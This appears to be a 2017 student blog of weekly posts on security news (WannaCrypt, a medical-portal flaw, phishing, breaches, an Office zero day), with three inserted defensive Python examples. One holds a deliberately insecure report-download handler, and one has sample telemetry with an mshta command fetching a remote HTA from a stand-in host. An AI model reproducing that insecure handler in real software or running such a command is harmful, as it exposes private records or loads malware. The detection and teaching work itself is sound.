Friday, June 2, 2017

Almost Done!

I would like to say this is my last time ever submitting an assignment, but that would be a lie. I still have 10 weeks, or two more classes, until I will be done and have graduated with my master’s degree. I can say the last ten classes have been challenging and they have helped me to be a well-rounded cybersecurity professional. This class has been the most challenging out of all the ones I have taken. I wish this class had been in person and not online, but I guess that option was not available. It seems like a lot of students are taking online classes so they don’t have to drive to class.
When Coach says to take this course last, he is absolutely correct. I only had two electives left and all the core classes completed before I took this one. I can see why the other classes are needed, because without those skills this class would be near impossible. The other classes help a student build on the Harry and Mae’s case study, and this class is the finish of the case study. Current Trends helps a student understand threat modeling and how a cybersecurity employee can find threats in an organization.
Since this is a master’s class there is no guidance on how to do the assignments. This is to replicate what it would be like in an actual job: your manager will ask for a report of vulnerabilities and ask you to send it to the executives for a meeting they will be having. To be honest, I have had this happen to me several times and I was not always prepared for it. This class has taught me what executives are looking for in a PowerPoint presentation and a report, so I’m a bit more prepared in my job.
The most difficult part of the course was understanding and identifying threats with the Microsoft STRIDE model. I had last used this in the risk class over a year ago, so I had to go back and brush up. The good thing is there are plenty of articles out on the internet explaining Microsoft STRIDE and what it does. After spending several hours researching and understanding STRIDE, the class became much easier. Once that core concept is understood, the next challenge is writing reports for the executives. When writing reports for executives there is a style a person needs to follow, and it can be hard to do that. When a person is used to writing technical reports and then switches to writing executive reports, it is a struggle. It took a lot for me to go back and reread my reports and correct wording that was technical rather than executive wording.
I would have liked to spend more time reviewing other students’ work. The reason for this is I like to see how other people handled the assignment and the format of the assignment. I also liked reading and making corrections because it gave more eyes than just the professor’s. I got great feedback from my classmates on items that I needed to change or add. This feedback allowed me to modify my assignments and make the changes for my later assignments.

Overall, this class has been a great experience in understanding threat modeling. Threat modeling is a skill every cybersecurity person should have, because without it a person would be chasing their tail. Since threat modeling is a skill, a person needs to keep up that skill with practice. I hope I’m able to keep practicing threat modeling after the class, and I also have a good book to keep as a reference. Thanks again, Coach; see you in the next class, White Collar Crime.

Sunday, May 21, 2017

Massive Cyber Attack

Introduction
The blog for week 10 will be dedicated to the massive cyber attack affecting over 150 countries. On May 12, 2017, a massive cyber attack was started because of a leaked NSA exploit. A hacking group called the Shadow Brokers broke into the NSA and stole a trove of exploits. From that trove, a piece of ransomware called WannaCrypt used two exploits called ETERNALBLUE and DOUBLEPULSAR. Below are more details on the history of how this massive cyber attack started.
Shadow Brokers
Who are the Shadow Brokers? The Shadow Brokers are a hacking group that is famous for stealing NSA hacking tools. The Shadow Brokers released a few of the NSA hacking tools in August of 2016 after they failed to auction off the tools (Gibbs, 2017). The Shadow Brokers voted for Donald Trump and were not happy with his policies and actions after he became president (Ghosh, 2017). They released the second group of NSA hacking tools in April 2017. The Shadow Brokers have more hacking tools to release, and Edward Snowden says the NSA has more hacking tools in its arsenal. The Shadow Brokers have yet to be identified and remain wanted for breaking into the NSA and stealing its tools.
ETERNALBLUE
ETERNALBLUE is the name of the exploit stolen from the NSA. ETERNALBLUE abuses Server Message Block (SMB), a network file sharing protocol (Fox-Brewster, 2017). SMB v1 is old, dating back to Windows 95, and it is enabled by default on Windows XP, Vista, 7, 8 and on some versions of 10. An attacker must send a specially crafted packet that exploits a vulnerability in SMB v1. Once the specially crafted packet has been sent, the attacker can run code on the victim’s computer. The code the attacker runs could be ransomware, a Trojan, or any other program the attacker wants to run.
DOUBLEPULSAR
DOUBLEPULSAR is another exploit that was stolen from the NSA. DOUBLEPULSAR is a remote access Trojan, or RAT, which allows attackers to have remote control of the victim’s computer. DOUBLEPULSAR also acts as a malware downloader to install other types of malware, such as bots. DOUBLEPULSAR exploits SMB v1 and can hide on a computer system, avoiding detection systems (Arghire, 2017).
WannaCrypt
WannaCrypt is a piece of malware in the ransomware family. Ransomware is malware that encrypts a person’s files and demands money to decrypt them. WannaCrypt raises the payment after a set amount of time, and it will also delete the files if no payment is received. WannaCrypt uses the ETERNALBLUE exploit to run itself on the victim’s machine. WannaCrypt is also a computer worm: it uses the ETERNALBLUE exploit to spread itself across a network in a matter of seconds. Once the victim’s computer is infected with WannaCrypt, it will scan random hosts on the internet to try and spread itself further (Kumar, 2017).
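The scanning behaviour just described is something a defender can look for on the network. As an added example, not code from this post or from any of the cited articles, the Python below runs a fan-out check over constructed firewall log lines: a source that reaches many distinct peers on TCP/445 inside a short window is flagged, while a workstation that talks to one file server over and over is not. The log format and every address in it are assumptions made for this example.

```python
"""Flag hosts that fan out to many distinct peers on TCP/445, the pattern an
SMB worm such as WannaCrypt produces while it scans for new victims.
All log lines below are constructed for this example, not real traffic."""
from collections import defaultdict
from datetime import datetime, timedelta


def _constructed_log():
    """Assumed firewall log format: '<iso-time> <src> <dst> <dport> <action>'."""
    base = datetime(2017, 5, 12, 10, 0, 0)
    lines = []
    # 10.0.5.17 behaves like an infected host: 25 distinct peers in 25 seconds.
    for i in range(25):
        t = base + timedelta(seconds=i)
        lines.append(f"{t.isoformat()} 10.0.5.17 10.0.5.{100 + i} 445 ALLOW")
    # 10.0.5.40 is a normal workstation: one file server, hit many times.
    for i in range(30):
        t = base + timedelta(seconds=20 * i)
        lines.append(f"{t.isoformat()} 10.0.5.40 10.0.5.1 445 ALLOW")
    # 10.0.5.41 reaches four different servers, but spread over nine minutes.
    for i in range(4):
        t = base + timedelta(minutes=3 * i)
        lines.append(f"{t.isoformat()} 10.0.5.41 10.0.5.{10 + i} 445 ALLOW")
    # 10.0.5.42 fans out on HTTPS, which is not the SMB pattern of interest.
    for i in range(30):
        t = base + timedelta(seconds=i)
        lines.append(f"{t.isoformat()} 10.0.5.42 10.0.5.{150 + i} 443 ALLOW")
    return lines


SAMPLE_LINES = _constructed_log()


def parse_line(line):
    """Split one log line into (timestamp, src, dst, dport, action)."""
    ts, src, dst, dport, action = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), action


def smb_fanout(lines, window_seconds=60, threshold=20):
    """Return {src: peak} for every source whose count of distinct TCP/445
    destinations inside some window of `window_seconds` reaches `threshold`.
    Distinct peers are counted, not connections, so a client hammering a
    single file server is never flagged."""
    window = timedelta(seconds=window_seconds)
    by_src = defaultdict(list)
    for line in lines:
        ts, src, dst, dport, _ = parse_line(line)
        if dport == 445:
            by_src[src].append((ts, dst))
    flagged = {}
    for src, events in by_src.items():
        events.sort()
        peak, end = 0, 0
        for start in range(len(events)):
            # Slide the window end forward while it still fits the window.
            while end < len(events) and events[end][0] - events[start][0] <= window:
                end += 1
            peers = {dst for _, dst in events[start:end]}
            peak = max(peak, len(peers))
        if peak >= threshold:
            flagged[src] = peak
    return flagged


if __name__ == "__main__":
    for src, peers in smb_fanout(SAMPLE_LINES).items():
        print(f"{src}: {peers} distinct SMB peers within 60s, possible worm activity")
```

Tune the window and threshold to your own network: a backup server or a vulnerability scanner will legitimately touch many hosts on 445 and belongs on an allow list.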
Conclusion
Microsoft, in its new versions of Windows, needs to stop backwards compatibility. As seen with ETERNALBLUE, an exploit was found in a 20-plus-year-old service. If Windows had stopped backwards compatibility, this massive attack could have been mitigated. People were surprised by the leak of the NSA hacking tools, but how hard was it to find a flaw in 20-year-old software? WannaCrypt hit systems that were not patched with MS17-010. Legacy systems may still use SMB v1, but old protocols should not be enabled on new operating systems by default. Microsoft has released a patch to fix the SMB v1 exploits, which includes a patch for Windows XP, Vista, 8, Server 2002, and Server 2008. Installing the patch is not a guarantee that there is not another backdoor. It is advised to disable old protocols if they are not being used, especially since the Shadow Brokers can release more NSA exploits.
References
Gibbs, S. (2017, May 18). Shadow Brokers Threaten To Unleash More Hacking Tools. Retrieved May 21, 2017, from http://www.cio-today.com/article/index.php?story_id=103003JXPSMS
Ghosh, A. (2017, April 09). 'President Trump what the f**k are you doing' say Shadow Brokers and dump more NSA hacking tools. Retrieved May 21, 2017, from http://www.ibtimes.co.uk/president-trump-what-fk-are-you-doing-say-shadow-brokers-dump-more-nsa-hacking-tools-1616141
Fox-Brewster, T. (2017, May 15). An NSA Cyber Weapon Might Be Behind A Massive Global Ransomware Outbreak. Retrieved May 21, 2017, from https://www.forbes.com/sites/thomasbrewster/2017/05/12/nsa-exploit-used-by-wannacry-ransomware-in-global-explosion/#3dcc7128e599
Arghire, I. (2017, April 24). Hackers Are Using NSA's DoublePulsar Backdoor in Attacks. Retrieved May 21, 2017, from http://www.securityweek.com/hackers-are-using-nsas-doublepulsar-backdoor-attacks
Kumar, M. (2017, May 15). WannaCry Ransomware: Everything You Need To Know Immediately. Retrieved May 21, 2017, from http://thehackernews.com/2017/05/how-to-wannacry-ransomware.html

Sunday, May 14, 2017

Microsoft Anti-virus and Healthcare Vulnerability

Introduction
In Week 9 there has been no shortage of security news. A healthcare organization had a vulnerability that allowed people to look at other patients’ records, which is quite serious. Microsoft had a remote code execution vulnerability that would allow an attacker to remotely control a machine. There were several other stories, but these were the two I chose to write on.
True Health Vulnerability
True Health Diagnostics (https://truehealthdiag.com/) had a major vulnerability discovered by a patient. The vulnerability was found on their patient portal, located at https://my.truehealthdiag.com/customlogin.htm. The patient was Troy Mursch, an IT consultant who lives in Las Vegas (Krebs, 2017). Mursch found the vulnerability when he was looking at a PDF of his blood test and saw that the link True Health Diagnostics created could be edited. Mursch edited the link to the PDF and was able to access other patients’ tests and records. Once Mursch found the vulnerability, he called and alerted True Health Diagnostics to the flaw. True Health Group shut down their website while they found and fixed the flaw.

At this point, there is no knowledge of how long the vulnerability has existed. This means patients or an attacker could have been stealing data for several years. True Health Diagnostics needs to hire a forensic company to come in and do an investigation. This is the only way to know if there was unauthorized access to patients’ records. If they don’t hire a forensic investigator, then I don’t think they are being ethical. I like the way True Health Diagnostics responded to the vulnerability by shutting off their site. This is the first time I have heard of this, and it is truly a bold and interesting move. Most companies would say they will investigate an issue and either fix or not fix it while keeping their website up.
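As an added example, not code from this post or from True Health Diagnostics, the Python below models the flaw in a few lines: a download handler that serves whichever report id appears in the link, the fixed handler that checks the report belongs to the logged-in patient, and a log review that lists every access where the id did not belong to the requester, which is the kind of check a forensic investigation would run over the portal's history. The records, ids and log format are constructed for this example.

```python
"""Vulnerable and fixed versions of a patient-portal report download, modelled
on the flaw described above, plus a log review for past abuse.
Patients, reports and log lines are constructed for this example."""

# Constructed records: report id -> owning patient and the PDF bytes.
REPORTS = {
    "1001": {"patient_id": "p-alice", "pdf": b"%PDF alice blood panel"},
    "1002": {"patient_id": "p-bob", "pdf": b"%PDF bob blood panel"},
}


class Forbidden(Exception):
    """Raised when a request must be refused."""


def download_report_vulnerable(session_patient_id, report_id):
    """Checks only that someone is logged in, never who owns the report, so
    editing the id in the link returns another patient's results. This is
    the insecure direct object reference pattern."""
    if session_patient_id is None:
        raise Forbidden("login required")
    return REPORTS[report_id]["pdf"]


def download_report_fixed(session_patient_id, report_id):
    """Authorizes on every request: the report must belong to the session's
    patient. A foreign report and a missing report are refused identically,
    so the response does not reveal which ids exist."""
    if session_patient_id is None:
        raise Forbidden("login required")
    report = REPORTS.get(report_id)
    if report is None or report["patient_id"] != session_patient_id:
        raise Forbidden("no such report")
    return report["pdf"]


def is_denied(handler, session_patient_id, report_id):
    """True if the handler refuses the request; used to compare both handlers."""
    try:
        handler(session_patient_id, report_id)
    except (Forbidden, KeyError):
        return True
    return False


# Constructed portal access log: '<iso-time> <session-patient> GET <path>'.
SAMPLE_ACCESS_LOG = [
    "2017-05-01T09:00:00 p-alice GET /reports/1001.pdf",
    "2017-05-01T09:00:30 p-alice GET /reports/1002.pdf",
    "2017-05-01T09:00:31 p-alice GET /reports/1003.pdf",
    "2017-05-01T10:15:00 p-bob GET /reports/1002.pdf",
]


def suspicious_accesses(log_lines):
    """Return the log lines where the requested report did not belong to the
    logged-in patient, including ids that do not exist (probing the id space).
    This is the retrospective check that answers whether the flaw was abused."""
    hits = []
    for line in log_lines:
        _, patient, _, path = line.split()
        report_id = path.rsplit("/", 1)[1].rsplit(".", 1)[0]
        owner = REPORTS.get(report_id, {}).get("patient_id")
        if owner != patient:
            hits.append(line)
    return hits


if __name__ == "__main__":
    print(download_report_vulnerable("p-alice", "1002"))  # Bob's results leak
    print(is_denied(download_report_fixed, "p-alice", "1002"))  # True
    for line in suspicious_accesses(SAMPLE_ACCESS_LOG):
        print("review:", line)
```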

Microsoft Remote Code Execution
It has been discovered that Microsoft has a vulnerability in its malware scanner. Google Project Zero found the remote code execution vulnerability in Windows anti-malware software. Per The Hacker News article, the affected software is Windows Defender, Windows Intune Endpoint Protection, Microsoft Security Essentials, Microsoft System Center Endpoint Protection, Microsoft Forefront Security for SharePoint, Microsoft Endpoint Protection and Microsoft Forefront Endpoint Protection (Kumar, 2017). Google’s Project Zero found that if any of the Microsoft anti-virus programs above scanned a specially crafted file, a hacker could gain full control of the computer. The file can get to the computer via an email phishing attack or by downloading the malicious file. One of the important details is that the attack can happen over email without reading or even opening the full email (Mix, 2017). Since Microsoft’s anti-virus programs have real-time scanning, once the file is created, opened, downloaded or moved it will trigger the exploit (Kumar, 2017). Microsoft has released a patch for Windows 7, 8, 10 and RT in only 3 days!

The remote code execution in this instance needs a special file for the exploit to work, but hackers can get their hands on this file and use it to spread malware. This “loophole” can allow a hacker to install new programs such as a Trojan or change program permissions, because it basically gives them ROOT access. It was good to see Microsoft patch this vulnerability so quickly, because it usually takes longer than 3 days. The scary part of this remote code execution exploit is that the file doesn’t even need to run to infect the computer; the Microsoft anti-virus program only has to scan it. These types of exploits make a hacker’s job easy because they don’t really require tricking a user into installing a file.
References
Krebs, Brian. "Krebs on Security." Brian Krebs. May 8, 2017. Accessed May 14, 2017. https://krebsonsecurity.com/2017/05/website-flaw-let-true-health-diagnostics-users-view-all-medical-records/.
Kumar, Mohit. "Microsoft Issues Emergency Patch For Critical RCE in Windows Malware Scanner." The Hacker News. May 09, 2017. Accessed May 14, 2017. http://thehackernews.com/2017/05/windows-defender-rce-flaw.html.
Mix. "Microsoft issues fix for critical exploit in Windows Defender found by Google." The Next Web. Accessed May 14, 2017. https://thenextweb.com/microsoft/2017/05/09/microsoft-google-windows-vulnerability/?amp=1

Saturday, May 6, 2017

Google Phishing Attack Plus Data Breach

Introduction
For Week 8 there has been no shortage of news articles to pick from. I will be covering another data breach at a large company and a large phishing attempt. Companies seem to be giving fewer and fewer details about data breaches, so I have found I need to write about other topics.
Google Phishing Attack
With all the news about the “Great Google Phishing Email” I figured I would talk about it in my blog. It is a simple phishing attempt that many people fell for, even security professionals. The phishing email was simple: it said “(Person’s name) has invited you to view the following document” and had a button to open the link in Google Docs. Below is a screenshot of the phishing message.


If a user clicks on the “Open in Docs” link, it opens a screen that says the person must allow access to “Google Docs” for the purpose of reading, sending, deleting and managing the person’s email, along with managing the person’s contacts (Khandelwal, 2017).

If a user clicks allow, the attackers have full control over the user’s email. Once full control is gained over the user’s mailbox, the attackers use it to spread the phishing email. If the user has two-factor authentication enabled, it will not stop the attackers from taking over the user’s email account. Per Google, only 1 percent of Gmail users were affected by this phishing attempt, which is about 1 million people (Khandelwal, 2017). Google has since blocked the fake application and the phishing email.
Even Google can be a victim of a phishing attack, so it is best to be on alert when opening documents sent by contacts. With security professionals fooled by this phishing attack, it shows that these types of attacks can be complex. Phishing attacks are thought to be easily spotted, but that is not always the case. Even simple attacks are missed because people don’t always read the entire email, which can lead to trouble. Google already does an excellent job of blocking most phishing emails, but if you use other email clients, be aware and always read the email entirely. Another good tip is to look at the sender’s email address, and if it is not recognizable, don’t click on any links.
SynXis Data Breach
Sabre Corp has had a breach of its software-as-a-service application called SynXis. The application comes from Sabre’s hospitality company, “Sabre Hospitality”. The SynXis system is reservation software that hotels use to keep track of inventory and rate information. Per sabrehospitality.com, over 120 property management, 2 revenue management and 7 CRM organizations use the software (http://www.sabrehospitality.com/solutions/hotel-central-reservation-systems). The hackers gained access to the SynXis application, but there is no information on what information they got ahold of or how they gained access to the system. Sabre has said the unauthorized access to the system has been terminated, and the security firm Mandiant is investigating the breach after law enforcement was notified (Krebs, 2017). This breach is thought to be linked to the recent hotel breaches over the last several months. On Sabre’s SynXis system login, only a username and password are required, and the breach may be a result of a credential stuffing attack using recently stolen usernames and passwords.

Sabre is a large organization with annual revenue of over 3 billion dollars, and it seems they have not invested in security. The SynXis system does not have two-factor authentication, which could have prevented the hackers from logging onto the system. Sabre paid for cyber security insurance, but without knowing more details it’s hard to say if the insurance will cover the breach. Cyber security insurance is new, but it is like covering a person’s house or car. For some companies, it may be cheaper to buy cyber security insurance than to hire a whole security team. Without more information about how the breach occurred, it is hard to say what could have been done to prevent it. Hotel companies seem to have lax security practices, which seems to be why hackers target them for credit and debit card information. When more information surfaces about the breach, I will write a follow-up entry.
References
Khandelwal, Swati. "Warning! Don't Click that Google Docs Link You Just Received in Your Email." The Hacker News. N.p., 03 May 2017. Web. 06 May 2017. <http://thehackernews.com/2017/05/google-docs-phishing-email.html>.
Krebs, Brian. "Krebs on Security." Brian Krebs. N.p., 2 May 2017. Web. 06 May 2017. <https://krebsonsecurity.com/2017/05/breach-at-sabre-corp-s-hospitality-unit/>.

Saturday, April 29, 2017

Bug Bounty plus UK Data Breach

Introduction
For Week 7 there have been interesting news articles. Of course there is another data breach, but this one happened outside of the United States. The United States Air Force has been following the other branches of the military and will start its own bug bounty program.
Bug Bounty
The United States Air Force has started a bug bounty program. The bug bounty program is designed to pay hackers or security researchers to find vulnerabilities in its systems. The pay is based on the vulnerabilities found and how critical they are. Hackers and security researchers are invited from the United States and five other countries. The countries are the United Kingdom, Canada, Australia, and New Zealand (Kumar, 2017). For the “Hack the Air Force” program, people must go through a background check and not have a criminal record. The reason for the background check and the no-criminal-record requirement is that people could access top secret materials and exfiltrate data. This will be one of the largest bug bounty programs put on by the United States military.
Allowing hackers inside the military network is a great idea! The best part is that if the hackers don’t find anything, the military doesn’t need to pay them. The last event, per the article, had over 14,000 hackers, and they found 138 vulnerabilities, plus 75,000 dollars was paid out in reward money (Kumar, 2017). Giving hackers a chance to use their skills to get paid is awesome! Hackers usually break into systems or steal information because they are bored or they want to make more money. The problem with this is that vulnerabilities can be leaked out or information taken if a person is not ethical. In the end, paying individuals instead of a company can result in more vulnerabilities being found, depending on the skill of the person.

Payday Loan Breach
A payday loan provider called Wonga has had its customers’ data stolen. Around 245,000 Wonga customers in the United Kingdom and 25,000 Wonga customers in Poland have been affected by the breach (Lomas, 2017). There is no information about how Wonga was broken into, but there will be more information in the following weeks. Wonga’s site has information about the data breach at https://www.wonga.com/help/incident-faq. The hackers may have gotten access to people’s names, email addresses, home addresses, phone numbers, the last four digits of their credit/debit card and/or bank account numbers, plus the sort codes (Lomas, 2017). Wonga believes that passwords weren’t taken during the incident, but as a safety precaution they want everyone to change their passwords.
The data breach happened on April 7, 2017, but there has been no update as to how the hackers got in. They will not release the information because it could be damaging to the company. An educated guess would be that Wonga left a security hole in an external-facing site. United Kingdom businesses in 2018 are going to want to better protect their customers’ data because of an upcoming law. The new EU law will require companies to notify the data protection authorities within 3 days or face a fine of up to 10 million euros (Lomas, 2017). Some people have even said that the hackers won’t get much from the company’s customers because they don’t have much money. Without knowing how the breach occurred, it is hard to say if the issue can be fixed.
Summary
If a company can’t hire its own internal security engineers, it needs to pay companies to look at its security. The internet is not going away, and with customers wanting more convenience, cyber security will only get more important. The United Kingdom implementing new laws requiring companies to report data breaches is a new concept. The United States does not have laws like the United Kingdom’s, but they are coming. Soon there will be a branch of the FBI that will investigate data breaches and issue fines if people’s personal information is not kept “up to code”. The other problem is every company wants all types of information, and most of it is not stored correctly. The way the information is stored in some industries is not regulated at the current moment in the United States.
References
Lomas, N. (2017, April 10). Payday loan firm Wonga suffers data breach affecting up to 270,000. Retrieved April 29, 2017, from https://techcrunch.com/2017/04/10/pay-day-loan-firm-wonga-suffers-data-breach-affecting-up-to-270000/
Kumar, M. (2017, April 27). Hack'em If You Can - U.S. Air Force launches Bug Bounty Program. Retrieved April 29, 2017, from http://thehackernews.com/2017/04/hack-the-air-force.html

Sunday, April 23, 2017

IHG Data Breach and NSA Hacking Tools Week 6

For week 6 I have two items to discuss. The first is the IHG, or InterContinental Hotels Group, data breach, and the second is how the leaked NSA tools are being used to attack Windows PCs. IHG had a breach back in December of 2016, and IHG said the data breach only affected a few of its properties. Now, in April 2017, IHG has released data showing that more than 1,000 IHG properties were affected by the data breach. IHG properties’ computer systems were compromised with malicious software designed to siphon customer debit and credit card data, just like Target and Home Depot (Krebs, 2017). IHG has been in the process of implementing a secure payment solution that will encrypt customer data end to end. Unfortunately, IHG only had a few sites done at the time of the data breach, and those were not affected. PCI has a requirement for point-to-point encryption, so it seems IHG is behind on its PCI requirements. At the following site, a person can look up which IHG properties were affected by the data breach and the dates: https://www.ihg.com/content/us/en/customer-care/protecting-our-guests/property-listing. The site can be used to see if a person’s credit or debit card was affected and if they need to be on the lookout for fraudulent charges. Below is a screenshot of an email sent to franchise hotels offering a forensic investigation to be paid for by IHG (Krebs, 2017).

The leaked NSA hacking tools are being used in the wild. A hacker group called the Shadow Brokers has leaked hacking tools that supposedly belonged to the NSA’s Equation Group (Khandelwal, 2017). A piece of malware designed by the NSA called DoublePulsar was one of the tools released by the Shadow Brokers. DoublePulsar is being used as a spying tool, and it is installed because of vulnerable SMB and RDP versions. DoublePulsar does not write any files to the computer, to remain stealthy, and DoublePulsar acts as a remote access Trojan. A person has released a Python script to test IP addresses to see if they have the DoublePulsar infection. The Python script is located at https://github.com/countercept/doublepulsar-detection-script. Below is a screenshot of someone who ran the Python script and found computers infected with DoublePulsar.

The number of affected machines has varied, but it seems at least 30,000 machines are infected. Microsoft has released patches to fix the SMB and RDP vulnerabilities. If people are still using end-of-life software such as Windows XP and Windows Server 2003, they are vulnerable and will remain vulnerable because they will not receive security patches (Khandelwal, 2017). Script kiddies and other hackers will be able to freely use DoublePulsar to infect machines and make them zombies until the patch from Microsoft has been applied.
With hotels and businesses not encrypting credit card data end to end, data breaches will continue to happen. One item that will not show up in the news articles is how the malware got installed on the machines. Some organizations do not have good security, and I know for a fact that at one hotel the computers are not locked down at all. It seems organizations would rather have a data breach than pay for security because it is cheaper. People have the stigma that if a company has a data breach it is bad, but because so many are happening it is just another day. Look at Target and Home Depot; people still shop there after they have had a massive data breach. People will continue to stay at IHG properties, and if they have stock there may be a blip in it, but it will come back. At the end of the day, security needs to be a priority for businesses that store or transport customers’ data.
References
Krebs, B. (2017, April 18). Krebs on Security. Retrieved April 23, 2017, from https://krebsonsecurity.com/2017/04/intercontinental-hotel-chain-breach-expands/
Khandelwal, S. (2017, April 22). Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs. Retrieved April 23, 2017, from http://thehackernews.com/2017/04/windows-hacking-tools.html

Wednesday, April 12, 2017

IRS Data Breach + Zero Day Week 5

During week 5 of CYBR 650 there has been plenty of security news. The blog this week will touch on a Microsoft zero day vulnerability and a data breach that happened at the IRS. This Microsoft zero day vulnerability is in Microsoft Office and allows remote code execution to take place. This vulnerability affects all current versions of Microsoft Office, which includes Office 2016. The vulnerability was first found by Ryan Hanson in July of 2016. McAfee reported the zero day on Friday, but said Microsoft has known about it since January (Goodin, 2017). Hackers are now using this vulnerability to spread banking malware called Dridex. A Word document that has been specially crafted can be opened on a computer, which allows an attacker to run code. A Word document containing a malicious OLE2link object is how the attack starts. This specific attack runs the exploit code, then makes a connection out to a remote server, where a malicious HTML Application file, or HTA, gets downloaded (Khandelwal, 2017). Once the HTA file gets downloaded it runs and downloads different pieces of malware designed to gain control of the computer or steal credentials. Below is a screenshot of a phishing email that contains a malicious Word document.


Microsoft released a patch yesterday to fix the vulnerability. This will stop the code from running if an email with the Word document gets through the security controls. The worst part about this zero day is that Microsoft has known about it and did not fix it. The fix only came out after hackers were using it to spread malware by emailing a Word document. Proofpoint saw the new malware campaign and was able to block the malicious Word document.
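The chain described above, a Word document handing off to a downloaded HTA, leaves a process tree a defender can match on. As an added example, not code from this post or from any vendor, the Python below walks constructed Sysmon-style process creation events and flags a script host (mshta.exe, wscript.exe, cscript.exe, PowerShell, cmd) whose ancestor within a few levels is an Office application, and any mshta.exe launched with a remote URL. The event fields, pids, paths and command lines are assumptions made for this example.

```python
"""Flag the process chain behind the Office zero day described above: an
Office application that ends up launching a script host such as mshta.exe.
Events below are constructed Sysmon-style process-create records, not real
telemetry; pids, paths and command lines are assumptions for this example."""
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}

OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"
SYS32 = r"C:\Windows\System32"

SAMPLE_EVENTS = [
    # A user opens a document; Word's parent is Explorer (pid 900, not logged).
    {"pid": 4120, "ppid": 900, "image": OFFICE_DIR + r"\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n "C:\\Users\\u\\Downloads\\invoice.doc"'},
    # The malicious OLE2link makes Word start mshta.exe against a remote HTA.
    {"pid": 4188, "ppid": 4120, "image": SYS32 + r"\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/template.hta"},
    # Word also spawns cmd.exe, which in turn starts PowerShell.
    {"pid": 5100, "ppid": 4120, "image": SYS32 + r"\cmd.exe",
     "cmdline": "cmd.exe /c powershell.exe"},
    {"pid": 5110, "ppid": 5100, "image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
    # Benign: a local help file opened from Explorer, no Office ancestor.
    {"pid": 5000, "ppid": 900, "image": SYS32 + r"\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\u\help.hta"'},
    # Benign: the print driver host, a common child of Word when printing.
    {"pid": 6001, "ppid": 4120, "image": SYS32 + r"\splwow64.exe",
     "cmdline": "splwow64.exe 12288"},
]


def _base(path):
    """Lower-cased file name of a Windows path, usable on any host OS."""
    return ntpath.basename(path).lower()


def has_office_ancestor(event, by_pid, max_depth=3):
    """Walk the parent chain up to max_depth levels looking for an Office app."""
    current = event
    for _ in range(max_depth):
        parent = by_pid.get(current["ppid"])
        if parent is None:
            return False
        if _base(parent["image"]) in OFFICE_APPS:
            return True
        current = parent
    return False


def flag_events(events, max_depth=3):
    """Return {pid: [reasons]} for events matching either rule:
    office_ancestor: a script host whose ancestor is an Office application;
    remote_hta: mshta.exe given a URL, i.e. an HTA fetched from a server."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for event in events:
        image = _base(event["image"])
        reasons = []
        if image in SCRIPT_HOSTS and has_office_ancestor(event, by_pid, max_depth):
            reasons.append("office_ancestor")
        if image == "mshta.exe" and "://" in event["cmdline"].lower():
            reasons.append("remote_hta")
        if reasons:
            findings[event["pid"]] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in flag_events(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(reasons)}")
```

The ancestor walk matters because the script host is not always a direct child of Word; an intermediate cmd.exe would otherwise hide the chain.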
The Internal Revenue Service, or IRS, has had a data breach that may affect up to 100,000 people. The IRS has a tool for FAFSA, or the Free Application for Federal Student Aid, that hackers have exploited. The tool for FAFSA helped families and students complete the form because it is lengthy. Since I have gotten my associate’s and bachelor’s and am currently getting my master’s, I have had to fill out the FAFSA forms. The FAFSA forms are long and are a pain to fill out. According to Krebs on Security, fraudsters may have been using the tool to get AGI, or adjusted gross income (Krebs, 2017). The IRS has disabled the tool because people were starting to use it for fraud. The tool is called the IRS Data Retrieval Tool, or DRT. John Koskinen went before the Senate Finance Committee to testify that fewer than 8,000 fraudulent returns were processed by the IRS (Cohn, 2017).
The good thing is the tool is expected to be back online, but not until October. Does the IRS run any penetration tests or security testing? It seems like their tools are put into production without any testing, and it is causing people to lose their personal information. The IRS needs to provide protection to the users that were affected by the breach. Companies that have had a data breach have provided identity theft protection, but the government does not provide these protections.
References
Goodin, D (2017, April 11). Microsoft Word 0-day used to push dangerous Dridex malware on millions. Retrieved April 13, 2017, from https://arstechnica.com/security/2017/04/microsoft-word-0day-used-to-push-dangerous-dridex-malware-on-millions/
Cohn, M. (2017, April 10). Data breach of IRS student financial aid tool may have affected 100,000 taxpayers. Retrieved April 13, 2017, from https://www.accountingtoday.com/news/data-breach-of-irs-student-financial-aid-tool-could-have-affected-100-000-taxpayers
Krebs, B. (2017, March 21). Krebs on Security. Retrieved April 13, 2017, from https://krebsonsecurity.com/2017/03/student-aid-tool-held-key-for-tax-fraudsters/
Khandelwal, S. (2017, April 11). Unpatched Microsoft Word Flaw is Being Used to Spread Dridex Banking Trojan. Retrieved April 13, 2017, from http://thehackernews.com/2017/04/microsoft-word-dridex-trojan.html